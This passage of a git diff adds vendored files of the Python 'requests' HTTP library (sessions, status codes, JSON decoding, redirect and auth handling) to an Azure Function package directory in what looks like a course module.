any. + + :param \*\*kwargs: Optional arguments that ``json.loads`` takes. + :raises requests.exceptions.JSONDecodeError: If the response body does not + contain valid json. + """ + + if not self.encoding and self.content and len(self.content) > 3: + # No encoding set. JSON RFC 4627 section 3 states we should expect + # UTF-8, -16 or -32. Detect which one to use; If the detection or + # decoding fails, fall back to `self.text` (using charset_normalizer to make + # a best guess). 
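In practice the fallbacks above mean callers only need to handle one exception type: `requests.exceptions.JSONDecodeError` aliases whichever JSON backend is in use. A sketch (the httpbin sample endpoint is an assumption):

```python
import requests

r = requests.get("https://httpbin.org/json")
try:
    payload = r.json()
except requests.exceptions.JSONDecodeError:
    payload = None  # body was not valid JSON
print(type(payload))  # <class 'dict'> on success
```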
+ encoding = guess_json_utf(self.content) + if encoding is not None: + try: + return complexjson.loads(self.content.decode(encoding), **kwargs) + except UnicodeDecodeError: + # Wrong UTF codec detected; usually because it's not UTF-8 + # but some other 8-bit codec. This is an RFC violation, + # and the server didn't bother to tell us what codec *was* + # used. + pass + except JSONDecodeError as e: + raise RequestsJSONDecodeError(e.msg, e.doc, e.pos) + + try: + return complexjson.loads(self.text, **kwargs) + except JSONDecodeError as e: + # Catch JSON-related errors and raise as requests.JSONDecodeError + # This aliases json.JSONDecodeError and simplejson.JSONDecodeError + raise RequestsJSONDecodeError(e.msg, e.doc, e.pos) + + @property + def links(self): + """Returns the parsed header links of the response, if any.""" + + header = self.headers.get("link") + + resolved_links = {} + + if header: + links = parse_header_links(header) + + for link in links: + key = link.get("rel") or link.get("url") + resolved_links[key] = link + + return resolved_links + + def raise_for_status(self): + """Raises :class:`HTTPError`, if one occurred.""" + + http_error_msg = "" + if isinstance(self.reason, bytes): + # We attempt to decode utf-8 first because some servers + # choose to localize their reason strings. If the string + # isn't utf-8, we fall back to iso-8859-1 for all other + # encodings. (See PR #3538) + try: + reason = self.reason.decode("utf-8") + except UnicodeDecodeError: + reason = self.reason.decode("iso-8859-1") + else: + reason = self.reason + + if 400 <= self.status_code < 500: + http_error_msg = ( + f"{self.status_code} Client Error: {reason} for url: {self.url}" + ) + + elif 500 <= self.status_code < 600: + http_error_msg = ( + f"{self.status_code} Server Error: {reason} for url: {self.url}" + ) + + if http_error_msg: + raise HTTPError(http_error_msg, response=self) + + def close(self): + """Releases the connection back to the pool. Once this method has been + called the underlying ``raw`` object must not be accessed again. + + *Note: Should not normally need to be called explicitly.* + """ + if not self._content_consumed: + self.raw.close() + + release_conn = getattr(self.raw, "release_conn", None) + if release_conn is not None: + release_conn() diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/packages.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/packages.py new file mode 100644 index 0000000..9ee2b49 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/packages.py @@ -0,0 +1,28 @@ +import sys + +try: + import chardet +except ImportError: + import warnings + + import charset_normalizer as chardet + + warnings.filterwarnings("ignore", "Trying to detect", module="charset_normalizer") + +# This code exists for backwards compatibility reasons. +# I don't like it either. Just look the other way. 
:) + +for package in ("urllib3", "idna"): + locals()[package] = __import__(package) + # This traversal is apparently necessary such that the identities are + # preserved (requests.packages.urllib3.* is urllib3.*) + for mod in list(sys.modules): + if mod == package or mod.startswith(f"{package}."): + sys.modules[f"requests.packages.{mod}"] = sys.modules[mod] + +target = chardet.__name__ +for mod in list(sys.modules): + if mod == target or mod.startswith(f"{target}."): + target = target.replace(target, "chardet") + sys.modules[f"requests.packages.{target}"] = sys.modules[mod] +# Kinda cool, though, right? diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/sessions.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/sessions.py new file mode 100644 index 0000000..5c685c0 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/sessions.py @@ -0,0 +1,831 @@ +""" +requests.sessions +~~~~~~~~~~~~~~~~~ + +This module provides a Session object to manage and persist settings across +requests (cookies, auth, proxies). +""" +import os +import sys +import time +from collections import OrderedDict +from datetime import timedelta + +from ._internal_utils import to_native_string +from .adapters import HTTPAdapter +from .auth import _basic_auth_str +from .compat import Mapping, cookielib, urljoin, urlparse +from .cookies import ( + RequestsCookieJar, + cookiejar_from_dict, + extract_cookies_to_jar, + merge_cookies, +) +from .exceptions import ( + ChunkedEncodingError, + ContentDecodingError, + InvalidSchema, + TooManyRedirects, +) +from .hooks import default_hooks, dispatch_hook + +# formerly defined here, reexposed here for backward compatibility +from .models import ( # noqa: F401 + DEFAULT_REDIRECT_LIMIT, + REDIRECT_STATI, + PreparedRequest, + Request, +) +from .status_codes import codes +from .structures import CaseInsensitiveDict +from .utils import ( # noqa: F401 + DEFAULT_PORTS, + default_headers, + get_auth_from_url, + get_environ_proxies, + get_netrc_auth, + requote_uri, + resolve_proxies, + rewind_body, + should_bypass_proxies, + to_key_val_list, +) + +# Preferred clock, based on which one is more accurate on a given system. +if sys.platform == "win32": + preferred_clock = time.perf_counter +else: + preferred_clock = time.time + + +def merge_setting(request_setting, session_setting, dict_class=OrderedDict): + """Determines appropriate setting for a given request, taking into account + the explicit setting on that request, and the setting in the session. If a + setting is a dictionary, they will be merged together using `dict_class` + """ + + if session_setting is None: + return request_setting + + if request_setting is None: + return session_setting + + # Bypass if not a dictionary (e.g. verify) + if not ( + isinstance(session_setting, Mapping) and isinstance(request_setting, Mapping) + ): + return request_setting + + merged_setting = dict_class(to_key_val_list(session_setting)) + merged_setting.update(to_key_val_list(request_setting)) + + # Remove keys that are set to None. Extract keys first to avoid altering + # the dictionary during iteration. + none_keys = [k for (k, v) in merged_setting.items() if v is None] + for key in none_keys: + del merged_setting[key] + + return merged_setting + + +def merge_hooks(request_hooks, session_hooks, dict_class=OrderedDict): + """Properly merges both requests and session hooks. 
+ + This is necessary because when request_hooks == {'response': []}, the + merge breaks Session hooks entirely. + """ + if session_hooks is None or session_hooks.get("response") == []: + return request_hooks + + if request_hooks is None or request_hooks.get("response") == []: + return session_hooks + + return merge_setting(request_hooks, session_hooks, dict_class) + + +class SessionRedirectMixin: + def get_redirect_target(self, resp): + """Receives a Response. Returns a redirect URI or ``None``""" + # Due to the nature of how requests processes redirects this method will + # be called at least once upon the original response and at least twice + # on each subsequent redirect response (if any). + # If a custom mixin is used to handle this logic, it may be advantageous + # to cache the redirect location onto the response object as a private + # attribute. + if resp.is_redirect: + location = resp.headers["location"] + # Currently the underlying http module on py3 decode headers + # in latin1, but empirical evidence suggests that latin1 is very + # rarely used with non-ASCII characters in HTTP headers. + # It is more likely to get UTF8 header rather than latin1. + # This causes incorrect handling of UTF8 encoded location headers. + # To solve this, we re-encode the location in latin1. + location = location.encode("latin1") + return to_native_string(location, "utf8") + return None + + def should_strip_auth(self, old_url, new_url): + """Decide whether Authorization header should be removed when redirecting""" + old_parsed = urlparse(old_url) + new_parsed = urlparse(new_url) + if old_parsed.hostname != new_parsed.hostname: + return True + # Special case: allow http -> https redirect when using the standard + # ports. This isn't specified by RFC 7235, but is kept to avoid + # breaking backwards compatibility with older versions of requests + # that allowed any redirects on the same host. + if ( + old_parsed.scheme == "http" + and old_parsed.port in (80, None) + and new_parsed.scheme == "https" + and new_parsed.port in (443, None) + ): + return False + + # Handle default port usage corresponding to scheme. + changed_port = old_parsed.port != new_parsed.port + changed_scheme = old_parsed.scheme != new_parsed.scheme + default_port = (DEFAULT_PORTS.get(old_parsed.scheme, None), None) + if ( + not changed_scheme + and old_parsed.port in default_port + and new_parsed.port in default_port + ): + return False + + # Standard case: root URI must match + return changed_port or changed_scheme + + def resolve_redirects( + self, + resp, + req, + stream=False, + timeout=None, + verify=True, + cert=None, + proxies=None, + yield_requests=False, + **adapter_kwargs, + ): + """Receives a Response. Returns a generator of Responses or Requests.""" + + hist = [] # keep track of history + + url = self.get_redirect_target(resp) + previous_fragment = urlparse(req.url).fragment + while url: + prepared_request = req.copy() + + # Update history and keep track of redirects. + # resp.history must ignore the original request in this loop + hist.append(resp) + resp.history = hist[1:] + + try: + resp.content # Consume socket so it can be released + except (ChunkedEncodingError, ContentDecodingError, RuntimeError): + resp.raw.read(decode_content=False) + + if len(resp.history) >= self.max_redirects: + raise TooManyRedirects( + f"Exceeded {self.max_redirects} redirects.", response=resp + ) + + # Release the connection back into the pool. 
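+            # Illustrative sketch (not part of the vendored source): passing
+            # yield_requests=True makes this generator yield the prepared
+            # request for each hop instead of sending it, e.g.:
+            #   for hop in session.resolve_redirects(resp, req, yield_requests=True):
+            #       print(hop.method, hop.url)
+            # where `session`, `resp` and `req` are assumed to already exist.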
+ resp.close() + + # Handle redirection without scheme (see: RFC 1808 Section 4) + if url.startswith("//"): + parsed_rurl = urlparse(resp.url) + url = ":".join([to_native_string(parsed_rurl.scheme), url]) + + # Normalize url case and attach previous fragment if needed (RFC 7231 7.1.2) + parsed = urlparse(url) + if parsed.fragment == "" and previous_fragment: + parsed = parsed._replace(fragment=previous_fragment) + elif parsed.fragment: + previous_fragment = parsed.fragment + url = parsed.geturl() + + # Facilitate relative 'location' headers, as allowed by RFC 7231. + # (e.g. '/path/to/resource' instead of 'http://domain.tld/path/to/resource') + # Compliant with RFC3986, we percent encode the url. + if not parsed.netloc: + url = urljoin(resp.url, requote_uri(url)) + else: + url = requote_uri(url) + + prepared_request.url = to_native_string(url) + + self.rebuild_method(prepared_request, resp) + + # https://github.com/psf/requests/issues/1084 + if resp.status_code not in ( + codes.temporary_redirect, + codes.permanent_redirect, + ): + # https://github.com/psf/requests/issues/3490 + purged_headers = ("Content-Length", "Content-Type", "Transfer-Encoding") + for header in purged_headers: + prepared_request.headers.pop(header, None) + prepared_request.body = None + + headers = prepared_request.headers + headers.pop("Cookie", None) + + # Extract any cookies sent on the response to the cookiejar + # in the new request. Because we've mutated our copied prepared + # request, use the old one that we haven't yet touched. + extract_cookies_to_jar(prepared_request._cookies, req, resp.raw) + merge_cookies(prepared_request._cookies, self.cookies) + prepared_request.prepare_cookies(prepared_request._cookies) + + # Rebuild auth and proxy information. + proxies = self.rebuild_proxies(prepared_request, proxies) + self.rebuild_auth(prepared_request, resp) + + # A failed tell() sets `_body_position` to `object()`. This non-None + # value ensures `rewindable` will be True, allowing us to raise an + # UnrewindableBodyError, instead of hanging the connection. + rewindable = prepared_request._body_position is not None and ( + "Content-Length" in headers or "Transfer-Encoding" in headers + ) + + # Attempt to rewind consumed file-like object. + if rewindable: + rewind_body(prepared_request) + + # Override the original request. + req = prepared_request + + if yield_requests: + yield req + else: + + resp = self.send( + req, + stream=stream, + timeout=timeout, + verify=verify, + cert=cert, + proxies=proxies, + allow_redirects=False, + **adapter_kwargs, + ) + + extract_cookies_to_jar(self.cookies, prepared_request, resp.raw) + + # extract redirect url, if any, for the next loop + url = self.get_redirect_target(resp) + yield resp + + def rebuild_auth(self, prepared_request, response): + """When being redirected we may want to strip authentication from the + request to avoid leaking credentials. This method intelligently removes + and reapplies authentication where possible to avoid credential loss. + """ + headers = prepared_request.headers + url = prepared_request.url + + if "Authorization" in headers and self.should_strip_auth( + response.request.url, url + ): + # If we get redirected to a new host, we should strip out any + # authentication headers. + del headers["Authorization"] + + # .netrc might have more auth for us on our new host. 
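+        # For example (hypothetical hosts): a redirect from
+        # https://api.example.com to https://assets.example.net drops the
+        # Authorization header, while an http -> https upgrade on the same
+        # host and default ports keeps it (see should_strip_auth above).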
+ new_auth = get_netrc_auth(url) if self.trust_env else None + if new_auth is not None: + prepared_request.prepare_auth(new_auth) + + def rebuild_proxies(self, prepared_request, proxies): + """This method re-evaluates the proxy configuration by considering the + environment variables. If we are redirected to a URL covered by + NO_PROXY, we strip the proxy configuration. Otherwise, we set missing + proxy keys for this URL (in case they were stripped by a previous + redirect). + + This method also replaces the Proxy-Authorization header where + necessary. + + :rtype: dict + """ + headers = prepared_request.headers + scheme = urlparse(prepared_request.url).scheme + new_proxies = resolve_proxies(prepared_request, proxies, self.trust_env) + + if "Proxy-Authorization" in headers: + del headers["Proxy-Authorization"] + + try: + username, password = get_auth_from_url(new_proxies[scheme]) + except KeyError: + username, password = None, None + + if username and password: + headers["Proxy-Authorization"] = _basic_auth_str(username, password) + + return new_proxies + + def rebuild_method(self, prepared_request, response): + """When being redirected we may want to change the method of the request + based on certain specs or browser behavior. + """ + method = prepared_request.method + + # https://tools.ietf.org/html/rfc7231#section-6.4.4 + if response.status_code == codes.see_other and method != "HEAD": + method = "GET" + + # Do what the browsers do, despite standards... + # First, turn 302s into GETs. + if response.status_code == codes.found and method != "HEAD": + method = "GET" + + # Second, if a POST is responded to with a 301, turn it into a GET. + # This bizarre behaviour is explained in Issue 1704. + if response.status_code == codes.moved and method == "POST": + method = "GET" + + prepared_request.method = method + + +class Session(SessionRedirectMixin): + """A Requests session. + + Provides cookie persistence, connection-pooling, and configuration. + + Basic Usage:: + + >>> import requests + >>> s = requests.Session() + >>> s.get('https://httpbin.org/get') + + + Or as a context manager:: + + >>> with requests.Session() as s: + ... s.get('https://httpbin.org/get') + + """ + + __attrs__ = [ + "headers", + "cookies", + "auth", + "proxies", + "hooks", + "params", + "verify", + "cert", + "adapters", + "stream", + "trust_env", + "max_redirects", + ] + + def __init__(self): + + #: A case-insensitive dictionary of headers to be sent on each + #: :class:`Request ` sent from this + #: :class:`Session `. + self.headers = default_headers() + + #: Default Authentication tuple or object to attach to + #: :class:`Request `. + self.auth = None + + #: Dictionary mapping protocol or protocol and host to the URL of the proxy + #: (e.g. {'http': 'foo.bar:3128', 'http://host.name': 'foo.bar:4012'}) to + #: be used on each :class:`Request `. + self.proxies = {} + + #: Event-handling hooks. + self.hooks = default_hooks() + + #: Dictionary of querystring data to attach to each + #: :class:`Request `. The dictionary values may be lists for + #: representing multivalued query parameters. + self.params = {} + + #: Stream response content default. + self.stream = False + + #: SSL Verification default. + #: Defaults to `True`, requiring requests to verify the TLS certificate at the + #: remote end. 
+ #: If verify is set to `False`, requests will accept any TLS certificate + #: presented by the server, and will ignore hostname mismatches and/or + #: expired certificates, which will make your application vulnerable to + #: man-in-the-middle (MitM) attacks. + #: Only set this to `False` for testing. + self.verify = True + + #: SSL client certificate default, if String, path to ssl client + #: cert file (.pem). If Tuple, ('cert', 'key') pair. + self.cert = None + + #: Maximum number of redirects allowed. If the request exceeds this + #: limit, a :class:`TooManyRedirects` exception is raised. + #: This defaults to requests.models.DEFAULT_REDIRECT_LIMIT, which is + #: 30. + self.max_redirects = DEFAULT_REDIRECT_LIMIT + + #: Trust environment settings for proxy configuration, default + #: authentication and similar. + self.trust_env = True + + #: A CookieJar containing all currently outstanding cookies set on this + #: session. By default it is a + #: :class:`RequestsCookieJar `, but + #: may be any other ``cookielib.CookieJar`` compatible object. + self.cookies = cookiejar_from_dict({}) + + # Default connection adapters. + self.adapters = OrderedDict() + self.mount("https://", HTTPAdapter()) + self.mount("http://", HTTPAdapter()) + + def __enter__(self): + return self + + def __exit__(self, *args): + self.close() + + def prepare_request(self, request): + """Constructs a :class:`PreparedRequest ` for + transmission and returns it. The :class:`PreparedRequest` has settings + merged from the :class:`Request ` instance and those of the + :class:`Session`. + + :param request: :class:`Request` instance to prepare with this + session's settings. + :rtype: requests.PreparedRequest + """ + cookies = request.cookies or {} + + # Bootstrap CookieJar. + if not isinstance(cookies, cookielib.CookieJar): + cookies = cookiejar_from_dict(cookies) + + # Merge with session cookies + merged_cookies = merge_cookies( + merge_cookies(RequestsCookieJar(), self.cookies), cookies + ) + + # Set environment's basic authentication if not explicitly set. + auth = request.auth + if self.trust_env and not auth and not self.auth: + auth = get_netrc_auth(request.url) + + p = PreparedRequest() + p.prepare( + method=request.method.upper(), + url=request.url, + files=request.files, + data=request.data, + json=request.json, + headers=merge_setting( + request.headers, self.headers, dict_class=CaseInsensitiveDict + ), + params=merge_setting(request.params, self.params), + auth=merge_setting(auth, self.auth), + cookies=merged_cookies, + hooks=merge_hooks(request.hooks, self.hooks), + ) + return p + + def request( + self, + method, + url, + params=None, + data=None, + headers=None, + cookies=None, + files=None, + auth=None, + timeout=None, + allow_redirects=True, + proxies=None, + hooks=None, + stream=None, + verify=None, + cert=None, + json=None, + ): + """Constructs a :class:`Request `, prepares it and sends it. + Returns :class:`Response ` object. + + :param method: method for the new :class:`Request` object. + :param url: URL for the new :class:`Request` object. + :param params: (optional) Dictionary or bytes to be sent in the query + string for the :class:`Request`. + :param data: (optional) Dictionary, list of tuples, bytes, or file-like + object to send in the body of the :class:`Request`. + :param json: (optional) json to send in the body of the + :class:`Request`. + :param headers: (optional) Dictionary of HTTP Headers to send with the + :class:`Request`. 
+ :param cookies: (optional) Dict or CookieJar object to send with the + :class:`Request`. + :param files: (optional) Dictionary of ``'filename': file-like-objects`` + for multipart encoding upload. + :param auth: (optional) Auth tuple or callable to enable + Basic/Digest/Custom HTTP Auth. + :param timeout: (optional) How long to wait for the server to send + data before giving up, as a float, or a :ref:`(connect timeout, + read timeout) ` tuple. + :type timeout: float or tuple + :param allow_redirects: (optional) Set to True by default. + :type allow_redirects: bool + :param proxies: (optional) Dictionary mapping protocol or protocol and + hostname to the URL of the proxy. + :param stream: (optional) whether to immediately download the response + content. Defaults to ``False``. + :param verify: (optional) Either a boolean, in which case it controls whether we verify + the server's TLS certificate, or a string, in which case it must be a path + to a CA bundle to use. Defaults to ``True``. When set to + ``False``, requests will accept any TLS certificate presented by + the server, and will ignore hostname mismatches and/or expired + certificates, which will make your application vulnerable to + man-in-the-middle (MitM) attacks. Setting verify to ``False`` + may be useful during local development or testing. + :param cert: (optional) if String, path to ssl client cert file (.pem). + If Tuple, ('cert', 'key') pair. + :rtype: requests.Response + """ + # Create the Request. + req = Request( + method=method.upper(), + url=url, + headers=headers, + files=files, + data=data or {}, + json=json, + params=params or {}, + auth=auth, + cookies=cookies, + hooks=hooks, + ) + prep = self.prepare_request(req) + + proxies = proxies or {} + + settings = self.merge_environment_settings( + prep.url, proxies, stream, verify, cert + ) + + # Send the request. + send_kwargs = { + "timeout": timeout, + "allow_redirects": allow_redirects, + } + send_kwargs.update(settings) + resp = self.send(prep, **send_kwargs) + + return resp + + def get(self, url, **kwargs): + r"""Sends a GET request. Returns :class:`Response` object. + + :param url: URL for the new :class:`Request` object. + :param \*\*kwargs: Optional arguments that ``request`` takes. + :rtype: requests.Response + """ + + kwargs.setdefault("allow_redirects", True) + return self.request("GET", url, **kwargs) + + def options(self, url, **kwargs): + r"""Sends a OPTIONS request. Returns :class:`Response` object. + + :param url: URL for the new :class:`Request` object. + :param \*\*kwargs: Optional arguments that ``request`` takes. + :rtype: requests.Response + """ + + kwargs.setdefault("allow_redirects", True) + return self.request("OPTIONS", url, **kwargs) + + def head(self, url, **kwargs): + r"""Sends a HEAD request. Returns :class:`Response` object. + + :param url: URL for the new :class:`Request` object. + :param \*\*kwargs: Optional arguments that ``request`` takes. + :rtype: requests.Response + """ + + kwargs.setdefault("allow_redirects", False) + return self.request("HEAD", url, **kwargs) + + def post(self, url, data=None, json=None, **kwargs): + r"""Sends a POST request. Returns :class:`Response` object. + + :param url: URL for the new :class:`Request` object. + :param data: (optional) Dictionary, list of tuples, bytes, or file-like + object to send in the body of the :class:`Request`. + :param json: (optional) json to send in the body of the :class:`Request`. + :param \*\*kwargs: Optional arguments that ``request`` takes. 
+ :rtype: requests.Response + """ + + return self.request("POST", url, data=data, json=json, **kwargs) + + def put(self, url, data=None, **kwargs): + r"""Sends a PUT request. Returns :class:`Response` object. + + :param url: URL for the new :class:`Request` object. + :param data: (optional) Dictionary, list of tuples, bytes, or file-like + object to send in the body of the :class:`Request`. + :param \*\*kwargs: Optional arguments that ``request`` takes. + :rtype: requests.Response + """ + + return self.request("PUT", url, data=data, **kwargs) + + def patch(self, url, data=None, **kwargs): + r"""Sends a PATCH request. Returns :class:`Response` object. + + :param url: URL for the new :class:`Request` object. + :param data: (optional) Dictionary, list of tuples, bytes, or file-like + object to send in the body of the :class:`Request`. + :param \*\*kwargs: Optional arguments that ``request`` takes. + :rtype: requests.Response + """ + + return self.request("PATCH", url, data=data, **kwargs) + + def delete(self, url, **kwargs): + r"""Sends a DELETE request. Returns :class:`Response` object. + + :param url: URL for the new :class:`Request` object. + :param \*\*kwargs: Optional arguments that ``request`` takes. + :rtype: requests.Response + """ + + return self.request("DELETE", url, **kwargs) + + def send(self, request, **kwargs): + """Send a given PreparedRequest. + + :rtype: requests.Response + """ + # Set defaults that the hooks can utilize to ensure they always have + # the correct parameters to reproduce the previous request. + kwargs.setdefault("stream", self.stream) + kwargs.setdefault("verify", self.verify) + kwargs.setdefault("cert", self.cert) + if "proxies" not in kwargs: + kwargs["proxies"] = resolve_proxies(request, self.proxies, self.trust_env) + + # It's possible that users might accidentally send a Request object. + # Guard against that specific failure case. + if isinstance(request, Request): + raise ValueError("You can only send PreparedRequests.") + + # Set up variables needed for resolve_redirects and dispatching of hooks + allow_redirects = kwargs.pop("allow_redirects", True) + stream = kwargs.get("stream") + hooks = request.hooks + + # Get the appropriate adapter to use + adapter = self.get_adapter(url=request.url) + + # Start time (approximately) of the request + start = preferred_clock() + + # Send the request + r = adapter.send(request, **kwargs) + + # Total elapsed time of the request (approximately) + elapsed = preferred_clock() - start + r.elapsed = timedelta(seconds=elapsed) + + # Response manipulation hooks + r = dispatch_hook("response", hooks, r, **kwargs) + + # Persist cookies + if r.history: + + # If the hooks create history then we want those cookies too + for resp in r.history: + extract_cookies_to_jar(self.cookies, resp.request, resp.raw) + + extract_cookies_to_jar(self.cookies, request, r.raw) + + # Resolve redirects if allowed. + if allow_redirects: + # Redirect resolving generator. + gen = self.resolve_redirects(r, request, **kwargs) + history = [resp for resp in gen] + else: + history = [] + + # Shuffle things around if there's history. + if history: + # Insert the first (original) request at the start + history.insert(0, r) + # Get the last request made + r = history.pop() + r.history = history + + # If redirects aren't being followed, store the response on the Request for Response.next(). 
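+        # Illustrative usage (hypothetical URL, assuming a Session `s`): with
+        # redirects disabled the hop is not followed, but the would-be next
+        # request is exposed:
+        #   r = s.get("http://example.com/old", allow_redirects=False)
+        #   r.status_code   # e.g. 301
+        #   r.next          # PreparedRequest for the Location target, or None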
+ if not allow_redirects: + try: + r._next = next( + self.resolve_redirects(r, request, yield_requests=True, **kwargs) + ) + except StopIteration: + pass + + if not stream: + r.content + + return r + + def merge_environment_settings(self, url, proxies, stream, verify, cert): + """ + Check the environment and merge it with some settings. + + :rtype: dict + """ + # Gather clues from the surrounding environment. + if self.trust_env: + # Set environment's proxies. + no_proxy = proxies.get("no_proxy") if proxies is not None else None + env_proxies = get_environ_proxies(url, no_proxy=no_proxy) + for (k, v) in env_proxies.items(): + proxies.setdefault(k, v) + + # Look for requests environment configuration + # and be compatible with cURL. + if verify is True or verify is None: + verify = ( + os.environ.get("REQUESTS_CA_BUNDLE") + or os.environ.get("CURL_CA_BUNDLE") + or verify + ) + + # Merge all the kwargs. + proxies = merge_setting(proxies, self.proxies) + stream = merge_setting(stream, self.stream) + verify = merge_setting(verify, self.verify) + cert = merge_setting(cert, self.cert) + + return {"proxies": proxies, "stream": stream, "verify": verify, "cert": cert} + + def get_adapter(self, url): + """ + Returns the appropriate connection adapter for the given URL. + + :rtype: requests.adapters.BaseAdapter + """ + for (prefix, adapter) in self.adapters.items(): + + if url.lower().startswith(prefix.lower()): + return adapter + + # Nothing matches :-/ + raise InvalidSchema(f"No connection adapters were found for {url!r}") + + def close(self): + """Closes all adapters and as such the session""" + for v in self.adapters.values(): + v.close() + + def mount(self, prefix, adapter): + """Registers a connection adapter to a prefix. + + Adapters are sorted in descending order by prefix length. + """ + self.adapters[prefix] = adapter + keys_to_move = [k for k in self.adapters if len(k) < len(prefix)] + + for key in keys_to_move: + self.adapters[key] = self.adapters.pop(key) + + def __getstate__(self): + state = {attr: getattr(self, attr, None) for attr in self.__attrs__} + return state + + def __setstate__(self, state): + for attr, value in state.items(): + setattr(self, attr, value) + + +def session(): + """ + Returns a :class:`Session` for context-management. + + .. deprecated:: 1.0.0 + + This method has been deprecated since version 1.0.0 and is only kept for + backwards compatibility. New code should use :class:`~requests.sessions.Session` + to create a session. This may be removed at a future date. + + :rtype: Session + """ + return Session() diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/status_codes.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/status_codes.py new file mode 100644 index 0000000..34295f3 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/status_codes.py @@ -0,0 +1,128 @@ +r""" +The ``codes`` object defines a mapping from common names for HTTP statuses +to their numerical codes, accessible either as attributes or as dictionary +items. + +Example:: + + >>> import requests + >>> requests.codes['temporary_redirect'] + 307 + >>> requests.codes.teapot + 418 + >>> requests.codes['\o/'] + 200 + +Some codes have multiple names, and both upper- and lower-case versions of +the names are allowed. For example, ``codes.ok``, ``codes.OK``, and +``codes.okay`` all correspond to the HTTP status code 200. 
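+
+For example, these are equivalent ways to spell 404::
+
+    >>> requests.codes.not_found == requests.codes['not_found'] == 404
+    True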
+""" + +from .structures import LookupDict + +_codes = { + # Informational. + 100: ("continue",), + 101: ("switching_protocols",), + 102: ("processing",), + 103: ("checkpoint",), + 122: ("uri_too_long", "request_uri_too_long"), + 200: ("ok", "okay", "all_ok", "all_okay", "all_good", "\\o/", "✓"), + 201: ("created",), + 202: ("accepted",), + 203: ("non_authoritative_info", "non_authoritative_information"), + 204: ("no_content",), + 205: ("reset_content", "reset"), + 206: ("partial_content", "partial"), + 207: ("multi_status", "multiple_status", "multi_stati", "multiple_stati"), + 208: ("already_reported",), + 226: ("im_used",), + # Redirection. + 300: ("multiple_choices",), + 301: ("moved_permanently", "moved", "\\o-"), + 302: ("found",), + 303: ("see_other", "other"), + 304: ("not_modified",), + 305: ("use_proxy",), + 306: ("switch_proxy",), + 307: ("temporary_redirect", "temporary_moved", "temporary"), + 308: ( + "permanent_redirect", + "resume_incomplete", + "resume", + ), # "resume" and "resume_incomplete" to be removed in 3.0 + # Client Error. + 400: ("bad_request", "bad"), + 401: ("unauthorized",), + 402: ("payment_required", "payment"), + 403: ("forbidden",), + 404: ("not_found", "-o-"), + 405: ("method_not_allowed", "not_allowed"), + 406: ("not_acceptable",), + 407: ("proxy_authentication_required", "proxy_auth", "proxy_authentication"), + 408: ("request_timeout", "timeout"), + 409: ("conflict",), + 410: ("gone",), + 411: ("length_required",), + 412: ("precondition_failed", "precondition"), + 413: ("request_entity_too_large",), + 414: ("request_uri_too_large",), + 415: ("unsupported_media_type", "unsupported_media", "media_type"), + 416: ( + "requested_range_not_satisfiable", + "requested_range", + "range_not_satisfiable", + ), + 417: ("expectation_failed",), + 418: ("im_a_teapot", "teapot", "i_am_a_teapot"), + 421: ("misdirected_request",), + 422: ("unprocessable_entity", "unprocessable"), + 423: ("locked",), + 424: ("failed_dependency", "dependency"), + 425: ("unordered_collection", "unordered"), + 426: ("upgrade_required", "upgrade"), + 428: ("precondition_required", "precondition"), + 429: ("too_many_requests", "too_many"), + 431: ("header_fields_too_large", "fields_too_large"), + 444: ("no_response", "none"), + 449: ("retry_with", "retry"), + 450: ("blocked_by_windows_parental_controls", "parental_controls"), + 451: ("unavailable_for_legal_reasons", "legal_reasons"), + 499: ("client_closed_request",), + # Server Error. 
+ 500: ("internal_server_error", "server_error", "/o\\", "✗"), + 501: ("not_implemented",), + 502: ("bad_gateway",), + 503: ("service_unavailable", "unavailable"), + 504: ("gateway_timeout",), + 505: ("http_version_not_supported", "http_version"), + 506: ("variant_also_negotiates",), + 507: ("insufficient_storage",), + 509: ("bandwidth_limit_exceeded", "bandwidth"), + 510: ("not_extended",), + 511: ("network_authentication_required", "network_auth", "network_authentication"), +} + +codes = LookupDict(name="status_codes") + + +def _init(): + for code, titles in _codes.items(): + for title in titles: + setattr(codes, title, code) + if not title.startswith(("\\", "/")): + setattr(codes, title.upper(), code) + + def doc(code): + names = ", ".join(f"``{n}``" for n in _codes[code]) + return "* %d: %s" % (code, names) + + global __doc__ + __doc__ = ( + __doc__ + "\n" + "\n".join(doc(code) for code in sorted(_codes)) + if __doc__ is not None + else None + ) + + +_init() diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/structures.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/structures.py new file mode 100644 index 0000000..f2005b5 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/structures.py @@ -0,0 +1,99 @@ +""" +requests.structures +~~~~~~~~~~~~~~~~~~~ + +Data structures that power Requests. +""" + +from collections import OrderedDict + +from .compat import Mapping, MutableMapping + + +class CaseInsensitiveDict(MutableMapping): + """A case-insensitive ``dict``-like object. + + Implements all methods and operations of + ``MutableMapping`` as well as dict's ``copy``. Also + provides ``lower_items``. + + All keys are expected to be strings. The structure remembers the + case of the last key to be set, and ``iter(instance)``, + ``keys()``, ``items()``, ``iterkeys()``, and ``iteritems()`` + will contain case-sensitive keys. However, querying and contains + testing is case insensitive:: + + cid = CaseInsensitiveDict() + cid['Accept'] = 'application/json' + cid['aCCEPT'] == 'application/json' # True + list(cid) == ['Accept'] # True + + For example, ``headers['content-encoding']`` will return the + value of a ``'Content-Encoding'`` response header, regardless + of how the header name was originally stored. + + If the constructor, ``.update``, or equality comparison + operations are given keys that have equal ``.lower()``s, the + behavior is undefined. + """ + + def __init__(self, data=None, **kwargs): + self._store = OrderedDict() + if data is None: + data = {} + self.update(data, **kwargs) + + def __setitem__(self, key, value): + # Use the lowercased key for lookups, but store the actual + # key alongside the value. 
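+        # e.g. cid["Accept"] = "application/json" stores ("Accept", value)
+        # under the key "accept", so cid["aCCEPT"] later finds the same slot.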
+        self._store[key.lower()] = (key, value)
+
+    def __getitem__(self, key):
+        return self._store[key.lower()][1]
